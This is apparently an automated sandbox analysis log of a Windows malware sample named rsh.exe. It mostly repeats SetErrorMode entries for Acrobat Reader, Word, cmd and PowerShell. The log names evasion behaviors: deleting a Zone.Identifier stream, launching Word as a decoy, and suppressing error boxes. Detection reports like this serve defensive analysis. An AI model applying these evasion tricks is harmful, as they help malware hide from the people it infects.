
Source: C:\Users\user\AppData\Local\Temp\rsh.exe

File opened: C:\Windows\system32\echoshims.exe:Zone.Identifier read attributes | delete

Starts Microsoft Word (often done to prevent that the user detects that something wrong)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Adobe\Reader 11.0\Reader\AcroRd32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
